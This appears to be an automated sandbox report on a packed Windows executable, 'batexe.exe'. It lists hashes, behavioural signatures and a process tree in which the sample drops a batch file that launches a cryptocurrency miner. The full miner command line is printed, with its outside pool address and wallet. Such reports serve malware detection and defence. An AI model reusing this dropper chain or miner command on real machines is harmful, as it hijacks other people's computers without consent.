73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
292s
max time network
303s
platform
windows10-1703_x64
resource
win10-20240214-ja
resource tags

arch:x64arch:x86image:win10-20240214-jalocale:ja-jpos:windows10-1703-x64systemwindows
submitted
19/02/2024, 18:46

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Executes dropped EXE 2 IoCs

pid	Process
4220	b2e.exe
428	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
428	cpuminer-sse2.exe
428	cpuminer-sse2.exe
428	cpuminer-sse2.exe
428	cpuminer-sse2.exe
428	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/4020-5-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 4020 wrote to memory of 4220	4020	batexe.exe	75
PID 4020 wrote to memory of 4220	4020	batexe.exe	75
PID 4020 wrote to memory of 4220	4020	batexe.exe	75
PID 4220 wrote to memory of 2824	4220	b2e.exe	76
PID 4220 wrote to memory of 2824	4220	b2e.exe	76
PID 4220 wrote to memory of 2824	4220	b2e.exe	76
PID 2824 wrote to memory of 428	2824	cmd.exe	79
PID 2824 wrote to memory of 428	2824	cmd.exe	79

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4020
- C:\Users\Admin\AppData\Local\Temp\96D1.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\96D1.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\96D1.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:4220
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\98D5.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2824
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:428

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\96D1.tmp\b2e.exe

Filesize
2.4MB

MD5
2445078d12495b87685c9a39b79b9da7

SHA1
cfb5468e7f65c9e52552f56a2946abf83c3a49d9

SHA256
67ee8539b0b1d67a1df23f511cff278d243ee2ef1ce434d95b9632eb3121363a

SHA512
a953bc02163f04f6023aafaa36c056bd7584c308a18a33b8d15743adfcb0ee283bf035a4bc623f62e74caa826b87f690d0e7b2ccd6690d0fc6e31bf343f7e6ee

Download Submit
C:\Users\Admin\AppData\Local\Temp\96D1.tmp\b2e.exe

Filesize
1.8MB

MD5
20a9714d6ca15248cb618808fc869b52

SHA1
132795d34d824469313b6329358555bbba287905

SHA256
ca38490125bc38457308fd488636ef61460fc9974626e15c0f412fa2aae897b6

SHA512
f6dfaa9d8275d829b5782baed96b3740a7228fab636f5fa3e4dbfaaaada448efe8c61e29626d257133040c7f27d7d9cb8b3fc597318cee972e00392ca2675f89

Download Submit
C:\Users\Admin\AppData\Local\Temp\98D5.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
580KB

MD5
16491d4eab6705ab2bb0c4acf967f013

SHA1
92727b175eb9e742530be20195aa7d04e191d5b1

SHA256
82ed562a1320de75074f165b1c0f133fceaa8c3a9edee54d359b862bedf44943

SHA512
dd1ac6c5db4333ffbc93394c35636b7c24ab9c7c52e406973547a9cbd47de222ef3ea37dde50e90d8c773fe85a4fead1400c9d5c2f25d5420345ea98cea5ae76

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
572KB

MD5
13ce9d1b755632a538beabe9bacbdda4

SHA1
ce3b201316198d547362780e7ced21249058f6de

SHA256
568bf726ea10d60b983b40b85fc1706e1f15136610b6fbb9b1ff2a77478585f3

SHA512
632f66981ab6f1efc24079a8cded341ff825af70278bb30d47b71b5c5de71d7abec73e02c5c31356a43a52ed83a90d66780e4eccd08ef185e260f8c92d06b591

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
400KB

MD5
91f6d15547bc168ba37e67d232fd4ba5

SHA1
6f9c4fe0f63bd742ac5930e9e5fd11418114cebe

SHA256
6ef8e2245252425121daef17e909c275d39af22984533f97749d20a21e6dc935

SHA512
622d4a69b37e7143dac9ac019b15ac9d6aaebb20241af90084ee9fca57730e5ebcbeae6e606d4c9fceab2763b8e05abf6924e29e5b735e2fdd6debe7bd8870df

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
378KB

MD5
4172943218019e21e7746038780ceb98

SHA1
1f13341138d11d6359f0fdc8afc4c45904678766

SHA256
20fcf7f5fbaf9397e7400f8094ab1dc4400a21381cc2a66f0f2701ea4349d039

SHA512
ce19b39e93f33259ad13abfe58ad04859a28e18c4539009b1e742ce31b1aee85bcbc62b4426003905f24ede2f17eb676c9b93454559d9010e273a67ad61e9af8

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
516KB

MD5
e13e54cad64cd537bddd9762dd08e234

SHA1
240df51ca16f8ed78c0011dccc070453bf10b119

SHA256
6f7f44a611c4680721aba7cea40ac86ff21dabffe541a090dfda6c8eafe7e968

SHA512
0c863c609250d0b734381bed8f60bd4fe17f3156bb64ef732ddf4926e4b6a21ae1137a1cbe0a4ffeb697a914a9c7042994e645df28ab2f7d7547d8da38872ab7

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
567KB

MD5
f9ad9ab1fe9d1a019c416a46a4b4d260

SHA1
61e15162d50cd0b2e472de84bcacb2f2c160e350

SHA256
5aceebc6ace1c8cc07357462fbe8635dfd711fccdf19bddb43c043d653817e56

SHA512
d8c7db6385e3b0df62982e2d13d34d950e0dede567c7574bfd85159f8e7e7101ddd31905f427012857f8c073d12dc973666998f56dd61d0ec256cb204bcb6819

Download Submit
\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
257KB

MD5
5fdd580da4fa0bc3407002cf9b3e7c2c

SHA1
9f2470220e8e86d644ce86c0b0d1d24e9eaa26a5

SHA256
329ab976025cecb287fc8acae191ff7fa6ed1c88b041942a98d9a92302ec0dbb

SHA512
67eff12c2a9a3e52030fd20fa3b8e4c4ca59fc36685e18d78dbb7443e6ecfa98da749a60f74bcb146902fed5383822f1e10405652bd6b3231b666b4b75192517

Download Submit
\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
368KB

MD5
c1481a966a7d60846d4738bfe7328b53

SHA1
9762fbbb7c4de3a7088653ad7bc1a3ccc94f4de9

SHA256
264c241f3668cc7ddaf62ce1885b3967f52334e1a74194f1d9d5bffed2759f01

SHA512
6f031f2e059dde317b437c4e339c632c5805ff461a20d5c6729f3fc70677c9ea8955ba6231f87eaea30a31dfa916066d0db6d71e8efcd7c29a40b2e3708fa634

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
180KB

MD5
698ca6118131421d78c8c5d5660d8c97

SHA1
b17f1cd6ac6415e9d351b30be57a819e3ed47e7e

SHA256
0b6e2bc1e5f296b4041301dac9e2f73ea258a6ff54d4d69bb8d4449bdd45af19

SHA512
951ce15ba73b4f19f0563ab8f5c08827464779c33a42b185b9721125b8612d66317733d4e8231ddd165ea30c68c6591f4565ea2f9d95ccb92991d57c410ebbca

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
274KB

MD5
1ffedc0ac4ae710e454714b44108a620

SHA1
c05edd963dca0e8d147217d28ced57f752a92a25

SHA256
8a78b11230abb6e31a8df606b68873ff2fb9ec0cd4e0df7f974e419b88ba2b33

SHA512
6f8c18cfc4a67c1ea1ebd35c9db2e4099b360121353ef81ed8dc451e6888aaa26a33584d572714c907c7ba6e903fd8bbc20f82ad40ab99a9288f9fc65e94be84

Download Submit
\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
606KB

MD5
585efec1bc1d4d916a4402c9875dff75

SHA1
d209613666ccac9d0ddab29a3bc59aa00a0968fa

SHA256
2f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232

SHA512
b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770

Download Submit
memory/428-42-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/428-51-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/428-101-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/428-43-0x0000000074ED0000-0x0000000074F68000-memory.dmp

Filesize
608KB

Download
memory/428-41-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/428-40-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/428-44-0x00000000010E0000-0x0000000002995000-memory.dmp

Filesize
24.7MB

Download
memory/428-45-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/428-91-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/428-81-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/428-56-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/428-61-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/428-66-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/428-71-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/428-76-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4020-5-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download
memory/4220-50-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/4220-6-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download